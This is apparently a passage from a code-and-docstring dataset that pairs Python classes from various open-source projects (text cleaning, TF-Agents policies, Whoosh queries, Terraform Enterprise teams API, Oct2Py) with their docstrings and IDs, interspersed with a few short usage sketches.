'.join([words[0].title()] + words[1:]) ) <NEW_LINE> <DEDENT> return ' '.join(text_parts_processed) <NEW_LINE> <DEDENT> def remove_double_pontuation(self, text): <NEW_LINE> <INDENT> not_double = punctuation <NEW_LINE> for d in self.double_pontuation: <NEW_LINE> <INDENT> not_double = not_double.replace(d, '') <NEW_LINE> <DEDENT> punct = re.escape(not_double) <NEW_LINE> pattern = '[{}]+([{}])'.format( punct, punct ) <NEW_LINE> if re.match(pattern, text) == False: <NEW_LINE> <INDENT> return text <NEW_LINE> <DEDENT> return re.sub(pattern, r'\1', text) <NEW_LINE> <DEDENT> def lower(self, text): <NEW_LINE> <INDENT> return text.lower() <NEW_LINE> <DEDENT> def transform(self, text): <NEW_LINE> <INDENT> if self.config['remove_double_pontuation']: <NEW_LINE> <INDENT> text = self.remove_double_pontuation(text) <NEW_LINE> <DEDENT> if self.config['remove_spaces']: <NEW_LINE> <INDENT> text = self.remove_spaces(text) <NEW_LINE> <DEDENT> if self.config['add_punctuation']: <NEW_LINE> <INDENT> text = self.add_punctuation(text) <NEW_LINE> <DEDENT> if self.config['captalize']: <NEW_LINE> <INDENT> text = self.captalize(text, self.config['sent_tokenizer']) <NEW_LINE> <DEDENT> return text
CorrectText Args: lower (bool): Transform text to lowercase before capitalizing the first letters of the sentences. Default: True remove_spaces (bool): Transform text removing double spaces. Default: True add_punctuation (bool): Transform text adding a dot where there is no punctuation. Default: True captalize (bool): Transform text capitalizing the first letter of each sentence. Default: True remove_double_pontuation (bool): Transform text removing double punctuation. Default: True sent_tokenizer (function): Function to utilize when capitalizing letters. Default: None
625990684a966d76dd5f069d
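The space-normalization step above boils down to two regex passes; a standalone sketch of just that step, with a made-up example sentence.

import re
from string import punctuation

def remove_spaces(text):
    # Collapse runs of spaces, then drop the space left before punctuation,
    # mirroring CorrectText.remove_spaces above.
    text = re.sub(' {2,}', ' ', text)
    text = re.sub(' ([{}])'.format(re.escape(punctuation)), r'\1', text)
    return text.strip()

print(remove_spaces('hello   world , how are  you ?'))
# -> 'hello world, how are you?'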
class JobRetry(ProcrastinateException): <NEW_LINE> <INDENT> def __init__(self, scheduled_at: datetime.datetime): <NEW_LINE> <INDENT> self.scheduled_at = scheduled_at <NEW_LINE> super().__init__()
Job should be retried.
625990684428ac0f6e659cda
class CocoConfig(Config): <NEW_LINE> <INDENT> NAME = "coco" <NEW_LINE> IMAGES_PER_GPU = 2 <NEW_LINE> NUM_CLASSES = 1 + 80
Configuration class for training on the MS COCO image dataset. Derives from the base Config class and overrides values specific to the COCO dataset.
625990687d847024c075db82
@gin.configurable(module='tf_agents', blacklist=['policy']) <NEW_LINE> class GreedyPolicy(tf_policy.Base): <NEW_LINE> <INDENT> def __init__(self, policy, name=None): <NEW_LINE> <INDENT> super(GreedyPolicy, self).__init__( policy.time_step_spec, policy.action_spec, policy.policy_state_spec, policy.info_spec, emit_log_probability=policy.emit_log_probability, name=name) <NEW_LINE> self._wrapped_policy = policy <NEW_LINE> <DEDENT> @property <NEW_LINE> def wrapped_policy(self): <NEW_LINE> <INDENT> return self._wrapped_policy <NEW_LINE> <DEDENT> def _variables(self): <NEW_LINE> <INDENT> return self._wrapped_policy.variables() <NEW_LINE> <DEDENT> def _distribution(self, time_step, policy_state): <NEW_LINE> <INDENT> def dist_fn(dist): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> greedy_action = dist.mode() <NEW_LINE> <DEDENT> except NotImplementedError: <NEW_LINE> <INDENT> raise ValueError("Your network's distribution does not implement mode " "making it incompatible with a greedy policy.") <NEW_LINE> <DEDENT> return DeterministicWithLogProb(loc=greedy_action) <NEW_LINE> <DEDENT> distribution_step = self._wrapped_policy.distribution( time_step, policy_state) <NEW_LINE> return policy_step.PolicyStep( tf.nest.map_structure(dist_fn, distribution_step.action), distribution_step.state, distribution_step.info)
Returns greedy samples of a given policy.
6259906801c39578d7f14309
class LazyComputation(object): <NEW_LINE> <INDENT> def __init__(self, reads, writes): <NEW_LINE> <INDENT> self.reads = set(flatten(reads)) <NEW_LINE> self.writes = set(flatten(writes)) <NEW_LINE> self._scheduled = False <NEW_LINE> <DEDENT> def enqueue(self): <NEW_LINE> <INDENT> global _trace <NEW_LINE> _trace.append(self) <NEW_LINE> return self <NEW_LINE> <DEDENT> def _run(self): <NEW_LINE> <INDENT> assert False, "Not implemented"
Helper class holding computation to be carried later on.
6259906897e22403b383c6b6
class LaunchRequestHandler(AbstractRequestHandler): <NEW_LINE> <INDENT> def can_handle(self, handler_input): <NEW_LINE> <INDENT> return ask_utils.is_request_type('LaunchRequest')(handler_input) <NEW_LINE> <DEDENT> def handle(self, handler_input): <NEW_LINE> <INDENT> logger.info('HANDLER:LaunchRequest') <NEW_LINE> if handler_input.request_envelope.context.system.user.access_token is None: <NEW_LINE> <INDENT> return ( handler_input.response_builder .speak(PHR_NOT_CONNECTED) .set_card(Card('LinkAccount')) .response ) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return ( handler_input.response_builder .speak(PHR_WELCOME) .ask(PHR_REPEAT) .response )
Handler for Skill Launch.
625990684f6381625f19a07a
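A hedged sketch of how this handler is typically registered with the ASK SDK's SkillBuilder. It assumes LaunchRequestHandler and the PHR_* phrase constants it reads live in this same module; the phrase strings below are placeholders, not the originals.

from ask_sdk_core.skill_builder import SkillBuilder

# Placeholder phrase constants (the handler above looks these up at module scope).
PHR_WELCOME = "Welcome back."
PHR_REPEAT = "What would you like to do?"
PHR_NOT_CONNECTED = "Please link your account in the Alexa app."

sb = SkillBuilder()
sb.add_request_handler(LaunchRequestHandler())  # the handler class defined above
lambda_handler = sb.lambda_handler()            # entry point for AWS Lambda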
class EditMixin: <NEW_LINE> <INDENT> def assertItemFieldsModified(self, library_items, items, fields=[], allowed=['path']): <NEW_LINE> <INDENT> for lib_item, item in zip(library_items, items): <NEW_LINE> <INDENT> diff_fields = [field for field in lib_item._fields if lib_item[field] != item[field]] <NEW_LINE> self.assertEqual(set(diff_fields).difference(allowed), set(fields)) <NEW_LINE> <DEDENT> <DEDENT> def run_mocked_interpreter(self, modify_file_args={}, stdin=[]): <NEW_LINE> <INDENT> m = ModifyFileMocker(**modify_file_args) <NEW_LINE> with patch('beetsplug.edit.edit', side_effect=m.action): <NEW_LINE> <INDENT> with control_stdin('\n'.join(stdin)): <NEW_LINE> <INDENT> self.importer.run() <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def run_mocked_command(self, modify_file_args={}, stdin=[], args=[]): <NEW_LINE> <INDENT> m = ModifyFileMocker(**modify_file_args) <NEW_LINE> with patch('beetsplug.edit.edit', side_effect=m.action): <NEW_LINE> <INDENT> with control_stdin('\n'.join(stdin)): <NEW_LINE> <INDENT> self.run_command('edit', *args)
Helper containing some common functionality used for the Edit tests.
62599068f7d966606f74948f
class WordNetSpacyPreprocessor: <NEW_LINE> <INDENT> def __init__(self, whitespace_tokenize_only: bool = False): <NEW_LINE> <INDENT> self.nlp = spacy.load('en_core_web_sm', disable=['tagger', 'parser', 'ner', 'textcat']) <NEW_LINE> if whitespace_tokenize_only: <NEW_LINE> <INDENT> self.nlp.tokenizer = WhitespaceTokenizer(self.nlp.vocab) <NEW_LINE> <DEDENT> self.spacy_to_wordnet_map = { 'PROPN': 'NOUN' } <NEW_LINE> <DEDENT> def __call__(self, text: str) -> List[Token]: <NEW_LINE> <INDENT> spacy_doc = self.nlp(text) <NEW_LINE> normalized_tokens = [ Token(spacy_token.text, pos_=self.spacy_to_wordnet_map.get(spacy_token.pos_, spacy_token.pos_), lemma_=spacy_token.lemma_ ) for spacy_token in spacy_doc if not spacy_token.is_space ] <NEW_LINE> return normalized_tokens
A "preprocessor" that really does POS tagging and lemmatization using spaCy, plus some hand-crafted rules. allennlp tokenizers take strings and return lists of Token classes; we run spaCy first, then modify the POS / lemmas as needed, and return a new list of Token objects.
62599068627d3e7fe0e08632
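The underlying spaCy step, shown standalone: tag, lemmatize, map PROPN to NOUN (WordNet has no proper-noun POS), and skip whitespace tokens. This sketch keeps the tagger enabled and assumes en_core_web_sm is installed.

import spacy

# Assumes: python -m spacy download en_core_web_sm
nlp = spacy.load('en_core_web_sm', disable=['parser', 'ner'])
spacy_to_wordnet = {'PROPN': 'NOUN'}

doc = nlp("Paris is running late")
for tok in doc:
    if tok.is_space:
        continue
    pos = spacy_to_wordnet.get(tok.pos_, tok.pos_)
    print(tok.text, pos, tok.lemma_)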
class ChannelReference(DataType): <NEW_LINE> <INDENT> def __init__(self, value, description="", units=""): <NEW_LINE> <INDENT> super(ChannelReference, self).__init__(value, description, units) <NEW_LINE> self._channel_name = value <NEW_LINE> <DEDENT> @property <NEW_LINE> def value(self): <NEW_LINE> <INDENT> return _DefaultGatewayFactory.get_workspace2().get_single_channel_value(self._channel_name) <NEW_LINE> <DEDENT> @value.setter <NEW_LINE> def value(self, newvalue): <NEW_LINE> <INDENT> _DefaultGatewayFactory.get_workspace2().set_single_channel_value(self._channel_name, newvalue) <NEW_LINE> <DEDENT> def _to_data_value(self, value): <NEW_LINE> <INDENT> return ClientApiDoubleValue(value)
Creates a new scalar channel reference. Creates a new reference to a scalar channel and specifies which channel assignment to map the new channel reference to. You can specify a channel by its alias or by the path to the channel in the system definition. For example: Targets/Controller/System Channels/Model Count.
625990687d43ff2487427fe5
class Instance(object): <NEW_LINE> <INDENT> def __init__(self, **kwargs): <NEW_LINE> <INDENT> self.can_ip_forward = kwargs.get('can_ip_forward') <NEW_LINE> self.cpu_platform = kwargs.get('cpu_platform') <NEW_LINE> self.creation_timestamp = kwargs.get('creation_timestamp') <NEW_LINE> self.description = kwargs.get('description') <NEW_LINE> self.disks = parser.json_unstringify(kwargs.get('disks')) <NEW_LINE> self.machine_type = kwargs.get('machine_type') <NEW_LINE> self.metadata = parser.json_unstringify(kwargs.get('metadata')) <NEW_LINE> self.name = kwargs.get('name') <NEW_LINE> self.network_interfaces = parser.json_unstringify( kwargs.get('network_interfaces')) <NEW_LINE> self.project_id = kwargs.get('project_id') <NEW_LINE> self.resource_id = kwargs.get('id') <NEW_LINE> self.scheduling = parser.json_unstringify(kwargs.get('scheduling')) <NEW_LINE> self.service_accounts = parser.json_unstringify( kwargs.get('service_accounts')) <NEW_LINE> self.status = kwargs.get('status') <NEW_LINE> self.status_message = kwargs.get('status_message') <NEW_LINE> self.tags = parser.json_unstringify(kwargs.get('tags')) <NEW_LINE> self.zone = kwargs.get('zone') <NEW_LINE> <DEDENT> @property <NEW_LINE> def key(self): <NEW_LINE> <INDENT> return Key.from_args(self.project_id, self.zone, self.name) <NEW_LINE> <DEDENT> def create_network_interfaces(self): <NEW_LINE> <INDENT> return [InstanceNetworkInterface(**ni) for ni in self.network_interfaces]
Represents Instance resource.
62599068435de62698e9d5b3
class MyHTMLParser(HTMLParser): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.level = 0 <NEW_LINE> self.level_array = [] <NEW_LINE> self.triggered = False <NEW_LINE> self.news_results = [] <NEW_LINE> <DEDENT> def handle_starttag(self, tag, attrs): <NEW_LINE> <INDENT> if tag == "script" or tag == "style": <NEW_LINE> <INDENT> key = 0 <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> key = 1 <NEW_LINE> <DEDENT> if self.level >= len(self.level_array): <NEW_LINE> <INDENT> self.level_array.append(key) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.level_array[self.level] = key <NEW_LINE> <DEDENT> self.level = self.level+1 <NEW_LINE> <DEDENT> def handle_endtag(self, tag): <NEW_LINE> <INDENT> self.level = self.level-1 <NEW_LINE> <DEDENT> def handle_data(self, data): <NEW_LINE> <INDENT> if self.level_array[self.level-1] == 1: <NEW_LINE> <INDENT> if self.triggered is True: <NEW_LINE> <INDENT> self.news_results.append(data) <NEW_LINE> <DEDENT> elif data == "Press Releases": <NEW_LINE> <INDENT> self.triggered = True <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def error(self, message): <NEW_LINE> <INDENT> print("Encountered an error ", message) <NEW_LINE> <DEDENT> def get_raw_news(self): <NEW_LINE> <INDENT> return self.news_results
Custom HTML parser
625990684e4d562566373bb0
class TestMediator(IMediator): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.q = Queue() <NEW_LINE> self.q.put(Marker('ABBA - Money Money Money', 0.0)) <NEW_LINE> self.q.put(Marker('John Travolta - Summer Lovin', 2.01)) <NEW_LINE> self.q.put(Marker('Imperial Leisure - Man On The Street', 3.84)) <NEW_LINE> self.q.put(Marker('Zammuto - Need Some Sun', 6.23)) <NEW_LINE> self.q.put(Marker('3typen - Pretty Little Thing', 7.98)) <NEW_LINE> self.q.put(Marker('The Darkness - Forbidden Love', 9.59)) <NEW_LINE> self.q.put(Marker('Justice - Fire', 13.01)) <NEW_LINE> self.q.listen = partial(self.listen, self.q) <NEW_LINE> <DEDENT> def subscribe(self, event_types: list): <NEW_LINE> <INDENT> return self.q <NEW_LINE> <DEDENT> def listen(self, q: Queue, block=True, timeout=5): <NEW_LINE> <INDENT> sleep(2) <NEW_LINE> yield q.get(block=block, timeout=timeout)
Mediator to test AudacityLabels.
62599068ac7a0e7691f73c8f
class Meta: <NEW_LINE> <INDENT> ordering = ["-id"]
Metadata class.
625990681b99ca400229010a
class Classify: <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.classification = None <NEW_LINE> self.confusion = None <NEW_LINE> self.data = None <NEW_LINE> self._log_loss = None <NEW_LINE> self.model = None <NEW_LINE> self.predict = None <NEW_LINE> self._score = None <NEW_LINE> self.x_train = None <NEW_LINE> self.x_test = None <NEW_LINE> self.y_train = None <NEW_LINE> self.y_test = None <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return 'Classify()' <NEW_LINE> <DEDENT> @property <NEW_LINE> def log_loss(self): <NEW_LINE> <INDENT> return f'Log Loss: {self._log_loss:.3f}' <NEW_LINE> <DEDENT> @property <NEW_LINE> def score(self): <NEW_LINE> <INDENT> return f'Model Score: {self._score:.3f}' <NEW_LINE> <DEDENT> def accuracy_vs_k(self, max_k=20, save=False): <NEW_LINE> <INDENT> accuracy = {} <NEW_LINE> for n in range(1, max_k, 1): <NEW_LINE> <INDENT> self.classify_data(model='KNN', n=n) <NEW_LINE> accuracy[n] = self._score <NEW_LINE> <DEDENT> fig = plt.figure('KNN Accuracy vs K', figsize=(8, 6), facecolor='white', edgecolor='black') <NEW_LINE> rows, cols = (1, 1) <NEW_LINE> ax0 = plt.subplot2grid((rows, cols), (0, 0)) <NEW_LINE> result = pd.Series(accuracy) <NEW_LINE> result.plot(ax=ax0) <NEW_LINE> ax0.set_title('Accuracy vs Nearest Neighbors Quantity', fontsize=size['title']) <NEW_LINE> ax0.set_xlabel('Nearest Neighbors Quantity $K$', fontsize=size['label']) <NEW_LINE> ax0.set_ylabel('Accuracy', fontsize=size['label']) <NEW_LINE> ax0.yaxis.set_major_formatter(ax_formatter['percent']) <NEW_LINE> save_fig('accuracy_vs_k', save) <NEW_LINE> <DEDENT> def classify_data(self, model='LR', n=1): <NEW_LINE> <INDENT> models = { 'KNN': sklearn.neighbors.KNeighborsClassifier(n_neighbors=n), 'LDA': LinearDiscriminantAnalysis(), 'LR': LogisticRegression(), 'NB': GaussianNB(), 'QDA': QuadraticDiscriminantAnalysis(), } <NEW_LINE> if model not in models.keys(): <NEW_LINE> <INDENT> logging.error(f'Requested model {model} has not been implemented.') <NEW_LINE> <DEDENT> self.model = (models[model] .fit(self.x_train, self.y_train)) <NEW_LINE> self.predict = self.model.predict(self.x_test) <NEW_LINE> self.confusion = pd.DataFrame(confusion_matrix(self.y_test, self.predict)) <NEW_LINE> self.classification = classification_report(self.y_test, self.predict) <NEW_LINE> self._log_loss = log_loss(self.y_test, self.model.predict_proba(self.x_test)) <NEW_LINE> self._score = self.model.score(self.x_test, self.y_test)
Base class for classification. :Attributes: - **classification** *str* classification report - **confusion** *DataFrame* confusion matrix - **data**: *DataFrame* data - **log_loss**: *float* cross-entropy loss - **model**: classification model type - **predict**: *ndarray* model predicted values - **x_train**: *DataFrame* training features - **y_train**: *Series* training response - **x_test**: *DataFrame* testing features - **y_test**: *Series* testing response
625990687c178a314d78e7c0
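The fit / predict / score / log-loss flow inside classify_data, shown standalone with scikit-learn on a toy dataset (the iris data and logistic-regression settings here are illustrative, not taken from the original project).

from sklearn.datasets import load_iris
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import classification_report, log_loss
from sklearn.model_selection import train_test_split

X, y = load_iris(return_X_y=True)
x_train, x_test, y_train, y_test = train_test_split(X, y, random_state=0)

model = LogisticRegression(max_iter=1000).fit(x_train, y_train)
predict = model.predict(x_test)

print(f'Model Score: {model.score(x_test, y_test):.3f}')
print(f'Log Loss: {log_loss(y_test, model.predict_proba(x_test)):.3f}')
print(classification_report(y_test, predict))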
class NumericRange(RangeMixin, qcore.Query): <NEW_LINE> <INDENT> def __init__(self, fieldname, start, end, startexcl=False, endexcl=False, boost=1.0, constantscore=True): <NEW_LINE> <INDENT> self.fieldname = fieldname <NEW_LINE> self.start = start <NEW_LINE> self.end = end <NEW_LINE> self.startexcl = startexcl <NEW_LINE> self.endexcl = endexcl <NEW_LINE> self.boost = boost <NEW_LINE> self.constantscore = constantscore <NEW_LINE> <DEDENT> def simplify(self, ixreader): <NEW_LINE> <INDENT> return self._compile_query(ixreader).simplify(ixreader) <NEW_LINE> <DEDENT> def estimate_size(self, ixreader): <NEW_LINE> <INDENT> return self._compile_query(ixreader).estimate_size(ixreader) <NEW_LINE> <DEDENT> def estimate_min_size(self, ixreader): <NEW_LINE> <INDENT> return self._compile_query(ixreader).estimate_min_size(ixreader) <NEW_LINE> <DEDENT> def docs(self, searcher): <NEW_LINE> <INDENT> q = self._compile_query(searcher.reader()) <NEW_LINE> return q.docs(searcher) <NEW_LINE> <DEDENT> def _compile_query(self, ixreader): <NEW_LINE> <INDENT> from whoosh.fields import NUMERIC <NEW_LINE> from whoosh.support.numeric import tiered_ranges <NEW_LINE> field = ixreader.schema[self.fieldname] <NEW_LINE> if not isinstance(field, NUMERIC): <NEW_LINE> <INDENT> raise Exception("NumericRange: field %r is not numeric" % self.fieldname) <NEW_LINE> <DEDENT> start = field.prepare_number(self.start) <NEW_LINE> end = field.prepare_number(self.end) <NEW_LINE> subqueries = [] <NEW_LINE> for starttext, endtext in tiered_ranges(field.type, field.signed, start, end, field.shift_step, self.startexcl, self.endexcl): <NEW_LINE> <INDENT> if starttext == endtext: <NEW_LINE> <INDENT> subq = terms.Term(self.fieldname, starttext) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> subq = TermRange(self.fieldname, starttext, endtext) <NEW_LINE> <DEDENT> subqueries.append(subq) <NEW_LINE> <DEDENT> if len(subqueries) == 1: <NEW_LINE> <INDENT> q = subqueries[0] <NEW_LINE> <DEDENT> elif subqueries: <NEW_LINE> <INDENT> q = nary.Or(subqueries, boost=self.boost) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return qcore.NullQuery <NEW_LINE> <DEDENT> if self.constantscore: <NEW_LINE> <INDENT> q = wrappers.ConstantScoreQuery(q, self.boost) <NEW_LINE> <DEDENT> return q <NEW_LINE> <DEDENT> def matcher(self, searcher, weighting=None): <NEW_LINE> <INDENT> q = self._compile_query(searcher.reader()) <NEW_LINE> return q.matcher(searcher, weighting=weighting)
A range query for NUMERIC fields. Takes advantage of tiered indexing to speed up large ranges by matching at a high resolution at the edges of the range and a low resolution in the middle. >>> # Match numbers from 10 to 5925 in the "number" field. >>> nr = NumericRange("number", 10, 5925)
625990687b25080760ed88b6
class NumpyDataset(ArrayDataset): <NEW_LINE> <INDENT> def __init__(self, filename): <NEW_LINE> <INDENT> arrs = np.load(filename) <NEW_LINE> keys = None <NEW_LINE> data = [] <NEW_LINE> if filename.endswith('.npy'): <NEW_LINE> <INDENT> data.append(arrs) <NEW_LINE> <DEDENT> elif filename.endswith('.npz'): <NEW_LINE> <INDENT> keys = sorted(arrs.keys()) <NEW_LINE> for key in keys: <NEW_LINE> <INDENT> data.append(arrs[key]) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> raise ValueError('Unsupported extension: %s'%filename) <NEW_LINE> <DEDENT> self._keys = keys <NEW_LINE> super(NumpyDataset, self).__init__(*data) <NEW_LINE> <DEDENT> @property <NEW_LINE> def keys(self): <NEW_LINE> <INDENT> return self._keys
A dataset wrapping over a Numpy binary (.npy, .npz) file. If the file is a .npy file, then a single numpy array is loaded. If the file is a .npz file with multiple arrays, then a list of numpy arrays are loaded, ordered by their key in the archive. Sparse matrix is not yet supported. Parameters ---------- filename : str Path to the .npy or .npz file. Properties ---------- keys: list of str or None The list of keys loaded from the .npz file.
6259906892d797404e389732
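The .npz handling above loads arrays ordered by sorted archive key; a standalone sketch of that behaviour (it writes a small toy.npz in the working directory).

import numpy as np

np.savez('toy.npz', labels=np.arange(3), features=np.ones((3, 2)))

arrs = np.load('toy.npz')
keys = sorted(arrs.keys())          # ['features', 'labels']
data = [arrs[k] for k in keys]      # arrays ordered by key, as NumpyDataset does
print(keys, [d.shape for d in data])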
class XVType(FrozenClass): <NEW_LINE> <INDENT> def __init__(self, binary=None): <NEW_LINE> <INDENT> if binary is not None: <NEW_LINE> <INDENT> self._binary_init(binary) <NEW_LINE> self._freeze = True <NEW_LINE> return <NEW_LINE> <DEDENT> self.X = 0 <NEW_LINE> self.Value = 0 <NEW_LINE> self._freeze = True <NEW_LINE> <DEDENT> def to_binary(self): <NEW_LINE> <INDENT> packet = [] <NEW_LINE> packet.append(uatype_Double.pack(self.X)) <NEW_LINE> packet.append(uatype_Float.pack(self.Value)) <NEW_LINE> return b''.join(packet) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def from_binary(data): <NEW_LINE> <INDENT> return XVType(data) <NEW_LINE> <DEDENT> def _binary_init(self, data): <NEW_LINE> <INDENT> self.X = uatype_Double.unpack(data.read(8))[0] <NEW_LINE> self.Value = uatype_Float.unpack(data.read(4))[0] <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return 'XVType(' + 'X:' + str(self.X) + ', ' + 'Value:' + str(self.Value) + ')' <NEW_LINE> <DEDENT> __repr__ = __str__
:ivar X: :vartype X: Double :ivar Value: :vartype Value: Float
62599068a17c0f6771d5d77c
class TFETeams(TFEEndpoint): <NEW_LINE> <INDENT> def __init__(self, base_url, organization_name, headers): <NEW_LINE> <INDENT> super().__init__(base_url, organization_name, headers) <NEW_LINE> self._teams_base_url = f"{base_url}/teams" <NEW_LINE> self._org_base_url = f"{base_url}/organizations/{organization_name}/teams" <NEW_LINE> <DEDENT> def create(self, payload): <NEW_LINE> <INDENT> return self._create(self._org_base_url, payload) <NEW_LINE> <DEDENT> def destroy(self, team_id): <NEW_LINE> <INDENT> url = f"{self._teams_base_url}/{team_id}" <NEW_LINE> return self._destroy(url) <NEW_LINE> <DEDENT> def lst(self): <NEW_LINE> <INDENT> return self._ls(self._org_base_url) <NEW_LINE> <DEDENT> def show(self, team_id): <NEW_LINE> <INDENT> url = f"{self._teams_base_url}/{team_id}" <NEW_LINE> return self._show(url)
The Teams API is used to create, edit, and destroy teams as well as manage a team's organization-level permissions. The Team Membership API is used to add or remove users from a team. Use the Team Access API to associate a team with privileges on an individual workspace. https://www.terraform.io/docs/enterprise/api/teams.html
625990686e29344779b01dfb
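A hedged usage sketch: the hostname, token, and organization are placeholders, and the payload shape follows the JSON:API format the Terraform Enterprise teams endpoint expects; it assumes the TFETeams class above (and its TFEEndpoint base) is importable.

base_url = "https://app.terraform.io/api/v2"
headers = {
    "Authorization": "Bearer <TOKEN>",          # placeholder token
    "Content-Type": "application/vnd.api+json",
}

teams = TFETeams(base_url, "my-org", headers)   # the class defined above

payload = {
    "data": {
        "type": "teams",
        "attributes": {"name": "api-created-team"},
    }
}
new_team = teams.create(payload)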
class S3Parser(object): <NEW_LINE> <INDENT> @staticmethod <NEW_LINE> def parse_rss(message): <NEW_LINE> <INDENT> db = current.db <NEW_LINE> s3db = current.s3db <NEW_LINE> table = s3db.msg_rss <NEW_LINE> record = db(table.message_id == message.message_id).select(table.title, table.from_address, table.body, table.created_on, table.tags, table.author, limitby=(0, 1) ).first() <NEW_LINE> if not record: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> body = record.body or record.title <NEW_LINE> author = record.author <NEW_LINE> if author: <NEW_LINE> <INDENT> ptable = s3db.pr_person <NEW_LINE> from nameparser import HumanName <NEW_LINE> name = HumanName(author) <NEW_LINE> first_name = name.first <NEW_LINE> middle_name = name.middle <NEW_LINE> last_name = name.last <NEW_LINE> query = (ptable.first_name == first_name) & (ptable.middle_name == middle_name) & (ptable.last_name == last_name) <NEW_LINE> exists = db(query).select(ptable.id, limitby=(0, 1) ).first() <NEW_LINE> if exists: <NEW_LINE> <INDENT> person_id = exists.id <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> person_id = ptable.insert(first_name = first_name, middle_name = middle_name, last_name = last_name) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> person_id = None <NEW_LINE> <DEDENT> tags = record.tags <NEW_LINE> url = record.from_address <NEW_LINE> table = s3db.cms_series <NEW_LINE> series_id = db(table.name == "News").select(table.id, limitby=(0, 1) ).first().id <NEW_LINE> table = db.cms_post <NEW_LINE> post_id = table.insert(title = record.title, body = body, created_on = record.created_on, person_id = person_id, series_id = series_id, ) <NEW_LINE> record = dict(id=post_id) <NEW_LINE> s3db.update_super(table, record) <NEW_LINE> if url: <NEW_LINE> <INDENT> s3db.doc_document.insert(doc_id = record["doc_id"], url = url, ) <NEW_LINE> <DEDENT> if tags: <NEW_LINE> <INDENT> ttable = db.cms_tag <NEW_LINE> ltable = db.cms_tag_post <NEW_LINE> for t in tags: <NEW_LINE> <INDENT> tag = db(ttable.name == t).select(ttable.id, limitby=(0, 1), ).first() <NEW_LINE> if tag: <NEW_LINE> <INDENT> tag_id = tag.id <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> tag_id = ttable.insert(name = t) <NEW_LINE> <DEDENT> ltable.insert(post_id = post_id, tag_id = tag_id, ) <NEW_LINE> <DEDENT> <DEDENT> return
Message Parsing Template.
62599068460517430c432c2a
class MatRead(object): <NEW_LINE> <INDENT> def __init__(self, temp_dir=None): <NEW_LINE> <INDENT> self.temp_dir = temp_dir <NEW_LINE> self.out_file = create_file(self.temp_dir) <NEW_LINE> <DEDENT> def setup(self, nout, names=None): <NEW_LINE> <INDENT> argout_list = [] <NEW_LINE> for i in range(nout): <NEW_LINE> <INDENT> if names: <NEW_LINE> <INDENT> argout_list.append(names.pop(0)) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> argout_list.append("%s__" % chr(i + 97)) <NEW_LINE> <DEDENT> <DEDENT> save_line = 'save -v6 {0} {1}'.format(self.out_file, ' '.join(argout_list)) <NEW_LINE> return argout_list, save_line <NEW_LINE> <DEDENT> def remove_file(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> os.remove(self.out_file) <NEW_LINE> <DEDENT> except (OSError, AttributeError): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> def extract_file(self, variables=None): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> data = loadmat(self.out_file) <NEW_LINE> <DEDENT> except UnicodeDecodeError as e: <NEW_LINE> <INDENT> raise Oct2PyError(str(e)) <NEW_LINE> <DEDENT> for key in list(data.keys()): <NEW_LINE> <INDENT> if key.startswith('_') and not key == '_': <NEW_LINE> <INDENT> del data[key] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> data[key] = get_data(data[key]) <NEW_LINE> <DEDENT> <DEDENT> if len(data) == 1: <NEW_LINE> <INDENT> return list(data.values())[0] <NEW_LINE> <DEDENT> elif data: <NEW_LINE> <INDENT> return data
Read Python values from a MAT file made by Octave. Strives to preserve both value and type in transit.
62599068e1aae11d1e7cf3e1
class ComparisonFrame(awx.Frame): <NEW_LINE> <INDENT> def __init__(self, parent, dirpaths=None, filepaths=None, wildcard=None, **kwargs): <NEW_LINE> <INDENT> super(ComparisonFrame, self).__init__(parent, -1, **kwargs) <NEW_LINE> main_sizer = wx.BoxSizer(wx.VERTICAL) <NEW_LINE> hsizer = wx.BoxSizer(wx.HORIZONTAL) <NEW_LINE> st1 = wx.StaticText(self, -1, "Quantity:", wx.DefaultPosition, wx.DefaultSize, 0) <NEW_LINE> st1.Wrap(-1) <NEW_LINE> hsizer.Add(st1, 0, wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.BOTTOM | wx.LEFT, 5) <NEW_LINE> plotter_choices = ["ebands", "edos", "mdf", "sigres"] <NEW_LINE> self.plotter_cbox = wx.ComboBox(self, -1, "ebands", wx.DefaultPosition, wx.DefaultSize, plotter_choices, 0) <NEW_LINE> hsizer.Add(self.plotter_cbox, 0, wx.ALL, 5) <NEW_LINE> compare_button = wx.Button(self, -1, "Compare", wx.DefaultPosition, wx.DefaultSize, 0) <NEW_LINE> compare_button.Bind(wx.EVT_BUTTON, self.OnCompareButton) <NEW_LINE> hsizer.Add(compare_button, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5) <NEW_LINE> main_sizer.Add(hsizer, 0, wx.ALIGN_CENTER_HORIZONTAL, 5) <NEW_LINE> self.panel = FileCheckBoxPanel(self, filepaths) <NEW_LINE> main_sizer.Add(self.panel, 1, wx.EXPAND, 5) <NEW_LINE> self.SetSizerAndFit(main_sizer) <NEW_LINE> <DEDENT> def OnCompareButton(self, event): <NEW_LINE> <INDENT> selected_files = self.panel.GetSelectedFilepaths() 